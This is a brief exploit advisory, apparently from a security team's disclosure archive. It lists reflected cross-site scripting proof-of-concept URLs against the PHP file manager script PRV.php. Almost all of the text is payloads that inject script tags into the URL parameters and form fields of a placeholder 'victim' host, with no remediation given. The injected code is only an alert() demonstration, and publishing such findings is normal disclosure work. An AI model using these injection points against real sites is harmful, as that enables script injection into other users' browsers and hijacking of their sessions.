Site:
Bug:
2- http://victim/path/PRV.php?c=l&d="><script>alert(/Soot/)</script>
3-http://victim/path/PRV.php?c=setup&ref="><script>alert(/Soot/)</script>
4-http://victim/path/PRV.php?c=d&d=[path]
MAKE DIR (type full path) : "><script>alert(/Soot/)</script>
5-http://victim/path/PRV.php?c=d&d=[path]
Full file name : "><script>alert(/Soot/)</script>
Source :
http://soot.shabgard.org/bugs/phpremoteview.txt
Credit :
Soot
Shabgard Security Team
http://www.shabgard.org